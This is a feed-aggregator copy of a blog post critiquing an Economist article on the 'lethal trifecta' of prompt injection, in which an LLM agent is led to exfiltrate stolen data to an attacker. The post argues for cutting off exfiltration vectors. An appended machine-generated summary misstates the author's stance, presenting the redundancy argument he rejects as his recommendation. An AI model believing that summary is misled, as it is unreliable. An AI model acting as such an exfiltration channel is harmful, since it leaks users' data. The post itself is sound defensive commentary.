Source URL: https://simonwillison.net/2025/Sep/26/how-to-stop-ais-lethal-trifecta/
Source: Simon Willison’s Weblog
Title: How to stop AI’s “lethal trifecta”
Feedly Summary: How to stop AI’s “lethal trifecta”
This is the second mention of the lethal trifecta in the Economist in just the last week! Their earlier coverage was Why AI systems may never be secure on September 22nd – I wrote about that here, where I called it “the clearest explanation yet I’ve seen of these problems in a mainstream publication".
I like this new article a lot less.
It makes an argument that I mostly agree with: building software on top of LLMs is more like traditional physical engineering – since LLMs are non-deterministic we need to think in terms of tolerances and redundancy:
The great works of Victorian England were erected by engineers who could not be sure of the properties of the materials they were using. In particular, whether by incompetence or malfeasance, the iron of the period was often not up to snuff. As a consequence, engineers erred on the side of caution, overbuilding to incorporate redundancy into their creations. The result was a series of centuries-spanning masterpieces.
AI-security providers do not think like this. Conventional coding is a deterministic practice. Security vulnerabilities are seen as errors to be fixed, and when fixed, they go away. AI engineers, inculcated in this way of thinking from their schooldays, therefore often act as if problems can be solved just with more training data and more astute system prompts.
My problem with the article is that I don’t think this approach is appropriate when it comes to security!
As I’ve said several times before, In application security, 99% is a failing grade. If there’s a 1% chance of an attack getting through, an adversarial attacker will find that attack.
The whole point of the lethal trifecta framing is that the only way to reliably prevent that class of attacks is to cut off one of the three legs!
Generally the easiest leg to remove is the exfiltration vectors – the ability for the LLM agent to transmit stolen data back to the attacker.
Via Hacker News
Tags: security, ai, prompt-injection, generative-ai, llms, exfiltration-attacks, lethal-trifecta
AI Summary and Description: Yes
Summary: The text discusses the challenges and vulnerabilities associated with AI systems, particularly large language models (LLMs), in relation to security. It critiques the prevailing mindset in AI engineering that likens it to conventional software engineering, arguing for a more cautionary approach akin to traditional physical engineering, emphasizing the importance of redundancy and the need to cut off potential attack vectors.
Detailed Description:
The article provides insight into the current discourse around AI security, particularly the concept of the “lethal trifecta” that encompasses three critical aspects that enable attacks on AI systems. Here’s a breakdown of the significant points made in the text:
– **Lethal Trifecta Introduction**:
– The term “lethal trifecta” refers to three conditions that, when present, can facilitate successful attacks on AI systems. While the article does not explicitly define these conditions, it implies they pertain to vulnerabilities in LLMs, particularly focused on exfiltration of data.
– **Non-deterministic Nature of LLMs**:
– LLMs are described as non-deterministic, which means their outputs can vary despite identical inputs. This raises a critical security challenge as it complicates the predictability and reliability of system behavior.
– **Comparison to Traditional Engineering**:
– The author draws a parallel between AI engineering and traditional physical engineering practices, suggesting that, much like engineers of the Victorian era who built with the uncertainty of material properties, AI engineers should adopt a mindset that incorporates redundancy and tolerances to safeguard against vulnerabilities.
– **Critique of Conventional AI Security Approaches**:
– The text argues that conventional AI security practices lack the necessary rigor. Unlike traditional coding, where bugs can be systematically fixed, vulnerabilities in AI models don’t necessarily disappear with training or improved prompts.
– **Importance of Redundancy**:
– The author advocates for a more cautious approach to AI security, emphasizing that even a 1% chance of a successful attack is unacceptable. By reasoning that attackers will exploit even the slightest vulnerabilities, it stresses the need for overall system robustness.
– **Focus on Exfiltration**:
– The article suggests that cutting off exfiltration vectors is the most effective way to mitigate the risk posed by the lethal trifecta, advocating for strategies that prevent LLMs from transferring compromised data to attackers.
Key Implications for Security Professionals:
– The text underscores the need for a paradigm shift in how AI security is approached, advocating for a more comprehensive risk management and mitigation strategy that acknowledges the unique challenges posed by LLMs.
– Security professionals in the AI domain should consider integrating principles from traditional engineering that emphasize redundancy and risk reduction into their practices.
– Developing robust security postures that proactively address vulnerabilities in AI systems, especially those relating to data exfiltration, is critical in safeguarding against adversarial threats.
This analysis encourages professionals to rethink existing security paradigms and adapt new methodologies to improve LLM security, ultimately pushing for a stronger defense strategy against evolving threats in the AI landscape.